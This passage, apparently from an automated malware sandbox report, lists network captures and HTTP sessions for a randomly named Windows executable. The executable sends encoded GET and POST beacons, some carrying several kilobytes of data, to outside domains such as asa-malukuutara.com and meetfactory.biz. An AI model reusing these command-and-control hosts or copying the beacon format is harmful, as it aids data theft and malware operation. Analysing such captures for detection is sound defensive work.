                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.767888069 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133547068 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133563042 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133822918 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499608994 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499694109 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499835014 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499870062 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499900103 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:48.676795006 CEST4977980192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:48.879807949 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:51.426132917 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:52.894547939 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:00.908396959 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:07.940546036 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:08.953552961 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:10.968733072 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:14.983470917 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:22.997318029 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:30.029413939 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:31.042460918 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:33.057638884 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:37.072376966 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:45.086276054 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.117217064 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.212044954 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.212285995 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.221096992 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.315915108 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328573942 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328742981 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328753948 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328766108 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328946114 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:57.724101067 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.741813898 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.840646029 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.840812922 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.849598885 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.945784092 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958468914 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958524942 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958544970 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958779097 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.959184885 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.959414959 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:00.364140034 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.381656885 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.475953102 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.476135015 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484154940 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484174013 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484235048 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578512907 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578624964 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578636885 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578645945 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578741074 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578986883 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578999043 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599069118 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599123001 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599147081 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599396944 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.600013018 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.600150108 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:02.988604069 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.006237984 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.100879908 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.101176977 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.106813908 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.201445103 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213773966 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213865995 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213880062 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213892937 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213901043 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213910103 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214099884 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214217901 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214483023 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214618921 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.217746019 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.312375069 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.223931074 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.319282055 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.319470882 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.327955961 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.422425032 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.933917999 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.933929920 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.934124947 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.935147047 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.935374975 CEST4980780192.168.11.20104.21.50.202
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Timestamp  Source IP  Dest IP  Checksum  Code  Type
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:11.274635077 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:15.289490938 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:23.304092884 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:30.335432053 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:31.348319054 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:33.365021944 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:37.378535032 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:45.392522097 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49740 | 199.59.243.227 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:35:42.183563948 CEST | 558 | OUT | GET /enra/?FlS=3ldH5dkH-dBLf&9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.285993099 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:35:41 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1486
                                                                                                                                                                                                                                                              x-request-id: 80b80f22-4f1c-4b99-a851-3c25ba91d834
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oBVEXdhsBCDDxl0D0YLxmHCBIJ9m739bFUg3BT4nH3PlKz4dxKmTpxz7Bn9b8YH9XjizRdAN5Bhrs+NoUApGgQ==
                                                                                                                                                                                                                                                              set-cookie: parking_session=80b80f22-4f1c-4b99-a851-3c25ba91d834; expires=Wed, 09 Oct 2024 11:50:42 GMT; path=/
                                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49741 | 103.247.8.53 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:35:58.580940962 CEST | 832 | OUT | POST /21hf/ HTTP/1.1
Host: www.asa-malukuutara.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.asa-malukuutara.com
Cache-Control: no-cache
Connection: close
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
Referer: http://www.asa-malukuutara.com/21hf/
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Data Ascii: 9B6h=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
Oct 9, 2024 13:35:59.114974976 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:35:58 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: br
Content-Length: 12492
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49742 | 103.247.8.53 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:36:01.483755112 CEST | 852 | OUT | POST /21hf/ HTTP/1.1
Host: www.asa-malukuutara.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.asa-malukuutara.com
Cache-Control: no-cache
Connection: close
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
Referer: http://www.asa-malukuutara.com/21hf/
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqLP1FgXAz2Rvux5JFnfghXMhEztTMKXFbfL6R/EB/N11AV/4EKaj3AwvJZa49/QnP7I0iu2UOzb2Lui/VfTQhHozaPJB+q8VsIdoy9+j6IiGDYpdSYZl5KXlthNSbbt1QtSzsUbWL2sq1f8KCX2P7UrTELeTzDVra9bv6Nb5CuDACA=
Oct 9, 2024 13:36:02.022720098 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:36:01 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49743 | 103.247.8.53 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:36:04.420373917 CEST | 8001 | OUT | POST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:36:05.090292931 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:36:04 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091356039 CEST1288INData Raw: b3 30 9b de 7c 45 b7 ff b1 1e fb da a8 76 ba 0f 23 6f df b0 31 c5 45 06 5f 7a 26 bd 5e 62 53 20 05 fd 7d 5d a0 a4 fc f0 87 ce bd 7d b0 b3 07 32 b5 ef 67 e3 fb 70 cd e7 bf 0b fe d6 66 34 37 75 b7 63 f3 c6 fb 2a df 1a f4 30 4b c9 a5 7f e4 54 df 53
                                                                                                                                                                                                                                                              Data Ascii: 0|Ev#o1E_z&^bS }]}2gpf47uc*0KTS5*uC4j!4@#ZAx! $&3Tu=]Ubh$H]:}jJ,J#rcu#J@&:#O]]5#uN~\


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49744 | 103.247.8.53 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:36:07.307566881 CEST | 556 | OUT | GET /21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:36:07.780873060 CEST | 521 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:36:07 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Location: http://asa-malukuutara.com/21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49745 | 72.14.178.174 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:36:21.382955074 CEST | 820 | OUT | POST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkEMgLVSbNUtBducYVUQdIxBQBklUIxT6dfc4R0kiL3gkROoLdtqWlUowxC5I8FlAOqAZu7S27RXIFefn7BqGLHKVKbo0Lz3YAth6VrcpUamp357AyE8SdHBdoOyi96TtslQhIgw0h/1NV5ahOkzTp5DwuZlCy6totjjVaboFSnlmwqQL3afuyMkg==
Oct 9, 2024 13:36:21.516876936 CEST | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:21 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49746 | 72.14.178.174 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:36:24.055092096 CEST | 840 | OUT | POST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts1fdcV0ljL3tEROgrdouWk5ow985IAFlAyqAbm7RH7QXYFcWH7DlmLHKVKbo0vd3cUthqFrdIUZ6Z34swyE4SdDBdo8ygZQTvElQkkgwA18/NUTXBPWyzcnaj30swu9rLRDvjLB13mDm1sYU7OydszX5v/bys34WMTkc1kCmeLYBoY=
Oct 9, 2024 13:36:24.189296007 CEST | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:24 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49747 | 72.14.178.174 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:36:26.720030069 CEST | 7989 | OUT | POST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
